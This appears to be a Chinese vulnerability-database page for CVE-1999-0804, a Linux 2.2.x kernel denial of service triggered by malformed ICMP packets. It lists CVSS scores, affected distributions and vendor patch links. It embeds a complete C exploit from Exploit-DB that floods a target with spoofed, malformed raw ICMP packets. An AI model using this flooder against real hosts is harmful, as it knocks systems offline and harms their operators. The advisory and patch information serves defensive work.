CVE-1999-0804
CVSS5.0
发布时间 :1999-06-01 00:00:00
修订时间 :2008-09-09 08:35:40
NMCOE    

[原文]Denial of service in Linux 2.2.x kernels via malformed ICMP packets containing unusual types, codes, and IP header lengths.


[CNNVD]多个Linux供应商IP选项漏洞(CNNVD-199906-002)

        Linux 2.2.x内核中存在漏洞。该漏洞通过包含不正常类型、编码和IP头的长度的畸形的ICMP数据包导致拒绝服务。

- CVSS (基础分值)

CVSS分值: 5 [中等(MEDIUM)]
机密性影响: NONE [对系统的机密性无影响]
完整性影响: NONE [不会对系统完整性产生影响]
可用性影响: PARTIAL [可能会导致性能下降或中断资源访问]
攻击复杂度: LOW [漏洞利用没有访问限制 ]
攻击向量: [--]
身份认证: NONE [漏洞利用无需身份认证]

- CPE (受影响的平台与产品)

cpe:/o:redhat:linux:6.0::i386
cpe:/o:linux:linux_kernel:2.2.0Linux Kernel 2.2
cpe:/o:debian:debian_linux:2.1Debian Debian Linux 2.1
cpe:/o:suse:suse_linux:6.1SuSE SuSE Linux 6.1

- OVAL (用于检测的技术细节)

未找到相关OVAL定义

- 官方数据库链接

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-1999-0804
(官方数据源) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-1999-0804
(官方数据源) NVD
http://www.cnnvd.org.cn/vulnerability/show/cv_cnnvdid/CNNVD-199906-002
(官方数据源) CNNVD

- 其它链接及资源

http://www.securityfocus.com/bid/302
(UNKNOWN)  BID  302

- 漏洞信息

多个Linux供应商IP选项漏洞
中危 未知
1999-06-01 00:00:00 2006-02-20 00:00:00
远程  
        Linux 2.2.x内核中存在漏洞。该漏洞通过包含不正常类型、编码和IP头的长度的畸形的ICMP数据包导致拒绝服务。

- 公告与补丁

        This vulnerability has been fixed in the Linux kernel version 2.3.5.
        Caldera has made the following fixed RPM available:
        ftp://ftp.calderasystems.com/pub/OpenLinux/updates/2.2/current/RPMS/linux-kernel-binary-2.2.5-2.i386.rpm
        Debian has made the following fixed kernel available for Debian Linux 2.1 under the SPARC archicture:
        http://security.debian.org/dists/stable/updates/binary-sparc/kernel-headers-2.2.9_2.2.9-2_sparc.deb
        MD5 checksum: 2d8724b357c1444741f2fdd626e38615
        http://security.debian.org/dists/stable/updates/binary-sparc/kernel-image-2.2.9-sun4u_2.2.9-2_sparc.deb
        MD5 checksum: bbff1631f05124fed467d833276f8d68
        http://security.debian.org/dists/stable/updates/binary-sparc/kernel-image-2.2.9_2.2.9-2_sparc.deb
        MD5 checksum: 7c9e15ae2c7de1d84928660b964906ad
        RedHat has made the following fixed RPMs available for RedHat Linux 6.0:
        Intel
        -----
        rpm -ivh ftp://updates.redhat.com/6.0/i386/kernel-2.2.5-22.i386.rpm
        rpm -ivh ftp://updates.redhat.com/6.0/i386/kernel-2.2.5-22.i586.rpm
        rpm -ivh ftp://updates.redhat.com/6.0/i386/kernel-smp-2.2.5-22.i586.rpm
        rpm -ivh ftp://updates.redhat.com/6.0/i386/kernel-2.2.5-22.i686.rpm
        rpm -ivh ftp://updates.redhat.com/6.0/i386/kernel-smp-2.2.5-22.i686.rpm
        Alpha
        -----
        rpm -ivh ftp://updates.redhat.com/6.0/alpha/kernel-2.2.5-22.alpha.rpm
        rpm -ivh ftp://updates.redhat.com/6.0/alpha/kernel-smp-2.2.5-22.alpha.rpm
        SPARC/UltraSPARC
        ----------------
        Note: These packages obsolete the earlier kernel-2.2.5-21 release
         for SPARC. The problems fixed by the 2.2.5-21 release are also
         fixed in 2.2.5-22.
        rpm -ivh ftp://updates.redhat.com/6.0/sparc/kernel-2.2.5-22.sparc.rpm
        rpm -ivh ftp://updates.redhat.com/6.0/sparc/kernel-smp-2.2.5-22.sparc.rpm
        rpm -ivh ftp://updates.redhat.com/6.0/sparc/kernel-2.2.5-22.sparc64.rpm
        rpm -ivh ftp://updates.redhat.com/6.0/sparc/kernel-smp-2.2.5-22.sparc64.rpm
        Source RPM
        ----------
        rpm -Uvh ftp://updates.redhat.com/6.0/SRPMS/kernel-2.2.5-22.src.rpm
        SuSe has made the following fixed available:
        ftp://ftp.suse.com/pub/SuSE-Linux/suse_update/kernel/linux-2.2.7.SuSE.tgz
        ftp://ftp.suse.com/pub/SuSE-Linux/suse_update/suse61/d1/lx_suse-2.2.7.SuSE-3.i386.rpm

- 漏洞信息 (19241)

Debian Linux 2.1,Linux kernel 2.2/2.3,RedHat Linux 6.0,S.u.S.E. Linux 6.1 IP Options Vulnerability (EDBID:19241)
linux remote
1999-06-01 Verified
0 Piotr Wilkin
N/A [点击下载]
source: http://www.securityfocus.com/bid/302/info

A vulnerability in the Linux Kernel's IPv4 option processing may allow a remote user to crash the system.

The vulnerability is the result of the kernel freeing a socket buffer when it shouldn't while sending an ICMP Parameter Problem error message in response to an IP packet with a malformed IP option. This results in the buffer being freed twice and in memory corruption.

Of the Debian Linux 2.1 supported architectures only the SPARC one is vulnerable. 

#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <netinet/ip.h>
#include <netinet/ip_icmp.h>
#include <arpa/inet.h>
#include <errno.h>
#include <unistd.h>
#include <netdb.h>

struct icmp_hdr
{
    struct iphdr iph;
    struct icmp icp;
    char text[1002];
} icmph;

int in_cksum(int *ptr, int nbytes)
{
    long sum;
    u_short oddbyte, answer;
    sum = 0;
    while (nbytes > 1)
    {
        sum += *ptr++;
        nbytes -= 2;
    }
    if (nbytes == 1)
    {
        oddbyte = 0;
        *((u_char *)&oddbyte) = *(u_char *)ptr;
        sum += oddbyte;
    }
    sum = (sum >> 16) + (sum & 0xffff);
    sum += (sum >> 16);
    answer = ~sum;
    return(answer);
}

struct sockaddr_in sock_open(char *address, int socket, int prt)
{
        struct hostent *host;
        if ((host = gethostbyname(address)) == NULL)
        {
                perror("Unable to get host name");
                exit(-1);
        }       
        struct sockaddr_in sin;
        bzero((char *)&sin, sizeof(sin));
        sin.sin_family = PF_INET;
        sin.sin_port = htons(prt);
        bcopy(host->h_addr, (char *)&sin.sin_addr, host->h_length);
        return(sin);
}
 
void main(int argc, char **argv)
{
        int sock, i, ctr, k;
        int on = 1;
        struct sockaddr_in addrs;
        if (argc < 3)
        {
                printf("Usage: %s <ip_addr> <port>\n", argv[0]);
                exit(-1);
        }   
        for (i = 0; i < 1002; i++)
        {
            icmph.text[i] = random() % 255;
        }
        sock = socket(AF_INET, SOCK_RAW, IPPROTO_RAW);
        if (setsockopt(sock, IPPROTO_IP, IP_HDRINCL, (char *)&on, sizeof(on)) == -1)
        {
            perror("Can't set IP_HDRINCL option on socket");
        }
        if (sock < 0)
        {
            exit(-1);
        }
        fflush(stdout);
        for (ctr = 0;ctr < 1001;ctr++)
        {
            ctr = ctr % 1000;
            addrs = sock_open(argv[1], sock, atoi(argv[2]));
            icmph.iph.version = 4;
            icmph.iph.ihl = 6;
            icmph.iph.tot_len = 1024;
            icmph.iph.id = htons(0x001);
            icmph.iph.ttl = 255;
            icmph.iph.protocol = IPPROTO_ICMP;
            icmph.iph.saddr = ((random() % 255) * 255 * 255 * 255) +
            ((random() % 255) * 65535) + 
            ((random() % 255) * 255) +
            (random() % 255);
            icmph.iph.daddr = addrs.sin_addr.s_addr;
            icmph.iph.frag_off = htons(0);
            icmph.icp.icmp_type = random() % 14;
            icmph.icp.icmp_code = random() % 10;
            icmph.icp.icmp_cksum = 0;
            icmph.icp.icmp_id = 2650;
            icmph.icp.icmp_seq = random() % 255;
            icmph.icp.icmp_cksum = in_cksum((int *)&icmph.icp, 1024);
            if (sendto(sock, &icmph, 1024, 0, (struct sockaddr *)&addrs,sizeof(struct sockaddr)) == -1)
            {
                if (errno != ENOBUFS) printf("X");
            }
            if (ctr == 0) printf("b00m ");
            fflush(stdout);
        }
        close(sock);
} 

		

- 漏洞信息

968
Linux Kernel Malformed ICMP Packet Parsing Remote DoS
Remote / Network Access Denial of Service
Loss of Availability Upgrade
Exploit Public Vendor Verified

- 漏洞描述

Denial of service in Linux 2.2.x kernels via malformed ICMP packets containing unusual types, codes, and IP header lengths.

- 时间线

1999-06-01 Unknow
Unknow Unknow

- 解决方案

Upgrade to version 2.4.12 or higher, as it has been reported to fix this vulnerability. An upgrade is required as there are no known workarounds.

- 相关参考

- 漏洞作者

Unknown or Incomplete
 

 

关于SCAP中文社区

SCAP中文社区是国内第一个以SCAP为主题的中文开放社区。了解更多信息,请查阅[关于本站]

版权声明

CVE/CWE/OVAL均为MITRE公司的注册商标,它们的官方数据源均保存在MITRE公司的相关网站